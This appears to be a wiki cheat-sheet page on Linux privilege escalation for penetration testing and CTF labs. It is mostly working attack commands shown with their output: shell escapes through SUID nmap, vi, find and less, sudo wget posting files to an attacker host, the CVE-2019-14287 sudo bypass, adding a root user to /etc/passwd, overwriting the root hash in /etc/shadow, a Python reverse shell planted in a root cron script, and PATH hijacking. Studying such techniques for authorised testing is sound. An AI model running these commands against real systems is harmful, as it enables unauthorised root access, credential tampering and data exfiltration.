Category:Penetration-testing/Privilege-escalation/Linux

From aldeid
Jump to navigation Jump to search
You are here
Linux

Enumeration

LinPEAS enumeration script

Find SUID programs

The below command lists all files with SUID bit set, owned by root. It means that you can run it as root. 

$ find / -user <USER> -perm -u=s -print 2>/dev/null

Execute commands & Indirect shell

Nmap

Nmap is its older release (2.02 to 5.21) had an interactive mode which allows to execute commands: 

$ nmap --interactive
nmap --interactive

Starting nmap V. 3.81 ( http://www.insecure.org/nmap/ )
Welcome to Interactive Mode -- press h <enter> for help
nmap> !whoami
!whoami
james

Vi(m)

To execute commands in vi(m), enter :!<command>.

To get a shell: :!/bin/sh

find

std@ubuntu:~$ touch x
std@ubuntu:~$ find x -exec /bin/sh \;
$ pwd
/home/std

less

std@ubuntu:~$ touch x
std@ubuntu:~$ less x

Now in less, enter !/bin/sh and you'll get a shell: 

$ pwd
/home/std

more

Same as with less. Enter !/bin/sh inside more and you'll get a shell.

mysql

select sys_eval('whoami');

Privilege escalation

SUID

What is SUID

In Linux, SUID (set owner userId upon execution) is a special type of file permission given to a file. SUID gives temporary permissions to a user to run the program/file with the permission of the file owner (rather than the user who runs it).

For example, the binary file to change your password (/usr/bin/passwd) has the SUID bit set on it (/usr/bin/passwd): 

$ ls -l /usr/bin/passwd
-rwsr-xr-x 1 root root 63960 Feb  7 15:54 /usr/bin/passwd

This is because to change your password, it will need to write to the shadowers file that you do not have access to, root does, so it has root privileges to make the right changes. 

rwx rwx rwx
  |   |   |
  v   v   v
rws rwx rwx

How to set SUID?

unknown@ubuntu:~$ ls -l /usr/bin/find
-rwxr-xr-x 1 root root 320160 Feb 17 17:05 /usr/bin/find
unknown@ubuntu:~$ sudo chmod u+s /usr/bin/find
unknown@ubuntu:~$ ls -l /usr/bin/find
-rwsr-xr-x 1 root root 320160 Feb 17 17:05 /usr/bin/find

Exploiting SUID programs

In the below example, our user is a standard user and not part of the sudoers.

Let's find a way to escalate the privileges. We start by listing programs with the SUID bit set: 

$ find / -user root -perm -4000 -print 2>/dev/null
/bin/ping
/bin/umount
/bin/mount
/bin/ping6
/bin/su
/usr/bin/passwd
/usr/bin/newgrp
/usr/bin/chsh
/usr/bin/chfn
/usr/bin/gpasswd
/usr/bin/sudo
/usr/local/bin/nmap
/usr/lib/openssh/ssh-keysign
/usr/lib/eject/dmcrypt-get-device
/usr/lib/vmware-tools/bin32/vmware-user-suid-wrapper
/usr/lib/vmware-tools/bin64/vmware-user-suid-wrapper
/usr/lib/pt_chown

Interestingly, nmap is on the list. Besides, it's a very old release (3.81), considering that the current release is 7.80 at the time of this writing. 

$ which nmap
which nmap
/usr/local/bin/nmap
$ nmap --version
nmap --version

nmap version 3.81 ( http://www.insecure.org/nmap/ )

As described here, nmap is its older release (2.02 to 5.21) had an interactive mode which allows to execute commands.

Besides, nmap has the SUID bit set and is owned by root, which means that we will be able to run commands as root: 

$ ls -l /usr/local/bin/nmap
ls -l /usr/local/bin/nmap
-rwsr-xr-x 1 root root 504736 Nov 13  2015 /usr/local/bin/nmap

Let's start nmap in interactive mode: 

$ nmap --interactive
nmap --interactive

Starting nmap V. 3.81 ( http://www.insecure.org/nmap/ )
Welcome to Interactive Mode -- press h <enter> for help
nmap> !whoami
!whoami
root

sudo

What is sudo

sudo is a program for Unix-like computer operating systems that allows users to run programs with the security privileges of another user, by default the superuser (root).

Exploiting sudo

In the below example, our user can't read the /root directory: 

jessie@CorpOne:~$ ls -l /root/
ls: cannot open directory '/root/': Permission denied

We need to elevate our privileges. Let's start by checking our privileges: 

jessie@CorpOne:~$ sudo -l
Matching Defaults entries for jessie on CorpOne:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User jessie may run the following commands on CorpOne:
    (ALL : ALL) ALL
    (root) NOPASSWD: /usr/bin/wget

We can run wget as root without password. Let's check here what we can do with it.

We can upload a file with sudo access (https://gtfobins.github.io/gtfobins/wget/): 

export URL=http://attacker.com/
export LFILE=file_to_send
wget --post-file=$LFILE $URL

Let's first open a listener on your local machine: 

$ nc -nlvp 1234

And on the remote machine, enter the following command: 

jessie@CorpOne:~$ sudo wget --post-file=/root/root_flag.txt 10.9.**.**:1234
--2020-05-14 09:11:19--  http://10.9.**.**:1234/
Connecting to 10.9.**.**:1234... connected.
HTTP request sent, awaiting response...

The flag will appear in our reverse shell.

(ALL, !root)

The CVE-2019-14287 vulnerability is explained as follows:

"A flaw was found in the way sudo implemented running commands with arbitrary user ID. If a sudoers entry is written to allow the attacker to run a command as any user except root, this flaw can be used by the attacker to bypass that restriction."

Let's see an example: 

$ sudo -l
[sudo] password for james: 
Matching Defaults entries for james on agent-sudo:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User james may run the following commands on agent-sudo:
    (ALL, !root) /bin/bash

Our user (james) can run /bin/bash as any user (ALL) except as root (!root). Let's exploit the vulnerability: 

james@agent-sudo:~$ sudo -u#-1 /bin/bash
[sudo] password for james: 
root@agent-sudo:~# whoami
root

Writeable password files

/etc/passwd

If the /etc/passwd file is writeable, you can create a new user.

In the below example, we are adding a user "new" with password "123" who will be root: 

user7@polobox:~$ openssl passwd -1 -salt "new" "123" 
$1$new$p7ptkEKU1HnaHpRtzNizS1
user7@polobox:~$ printf 'new:$1$new$p7ptkEKU1HnaHpRtzNizS1:0:0:root:/root:/bin/bash\n' >> /etc/passwd

Switch to the new user to be root: 

user7@polobox:~$ su - new
Password: 
root@polobox:~# whoami
root

/etc/shadow

In the below example, the /etc/shadow file is writeable by everybody: 

$ ls -l /etc/shadow
-rw-r--rw- 1 root shadow 837 Aug 25  2019 /etc/shadow

Let's generate a password: 

$ mkpasswd -m sha-512 Try_H4ck#M3
$6$bu3aRTYBC3Y.Gw$MmzIeurk34HKfeSSs6TJ5yzyR5jTxlt6YKCq4dQ76R3BBm3rdcihkzy1Anehp5RDp847cgweMKRifq4NYlNbk.

Now edit the root's hash to replace the existing hash with the one above: 

user@debian:/tmp$ cat /etc/shadow
root:$6$bu3aRTYBC3Y.Gw$MmzIeurk34HKfeSSs6TJ5yzyR5jTxlt6YKCq4dQ76R3BBm3rdcihkzy1Anehp5RDp847cgweMKRifq4NYlNbk.:17298:0:99999:7:::
daemon:*:17298:0:99999:7:::
bin:*:17298:0:99999:7:::
[REDACTED]

You can now login as root with the password that you have defined: 

user@debian:/tmp$ su - root
Password: 
root@debian:~# whoami
root

Crontab

In the below example, the user is a standard user, who is not in the sudoers, but wants to elevate his privileges.

Luckily, there is a cron job that executes a program in his home directory, as root: 

user3@polobox:/home/user4/Desktop$ cat /etc/crontab 

SHELL=/bin/sh
PATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin

# m h dom mon dow user	command
*/5  *    * * * root    /home/user4/Desktop/autoscript.sh
17 *	* * *	root    cd / && run-parts --report /etc/cron.hourly
25 6	* * *	root	test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.daily )
47 6	* * 7	root	test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.weekly )
52 6	1 * *	root	test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.monthly )
#

The user can override the autoscript.sh script with a python reverse shell: 

user4@polobox:~$ printf "python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((\"10.9.**.**\",1234));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call([\"/bin/sh\",\"-i\"]);'\n" > /home/user4/Desktop/autoscript.sh

Open a listener on your machine and wait for the cronjob to spawn a shell: 

$ nc -nlvp 1234
Ncat: Version 7.80 ( https://nmap.org/ncat )
Ncat: Listening on :::1234
Ncat: Listening on 0.0.0.0:1234
Ncat: Connection from 10.10.9.117.
Ncat: Connection from 10.10.9.117:51804.
/bin/sh: 0: can't access tty; job control turned off
# whoami
root
#

Environment variables

To print all environment variables, use the printenv command.

In the below example, we have a script that executes the ls command, and his owned by root and has the SUID bit set: 

user5@polobox:/tmp$ ls -l /home/user5/script
-rwsr-xr-x 1 root root 8392 Jun  4  2019 /home/user5/script
user5@polobox:~$ ./script 
Desktop  Documents  Downloads  Music  Pictures	Public	script	Templates  Videos
user5@polobox:~$ ls
Desktop  Documents  Downloads  Music  Pictures  Public  script  Templates  Videos

We can exploit this to define a new ls command that will actually execute a shell (/bin/sh) 

user5@polobox:~$ cd /tmp/
user5@polobox:/tmp$ echo "/bin/bash" > ls
user5@polobox:/tmp$ chmod +x ls
user5@polobox:/tmp$ export PATH=/tmp:$PATH

Now, when we run the script, it will spawn a privileged shell instead of executing ls: 

user5@polobox:/tmp$ cd
user5@polobox:~$ ./script  
root@polobox:~# whoami
root

Pages in category "Penetration-testing/Privilege-escalation/Linux"

The following 3 pages are in this category, out of 3 total.

T

Retrieved from "https://www.aldeid.com/w/index.php?title=Category:Penetration-testing/Privilege-escalation/Linux&oldid=35872"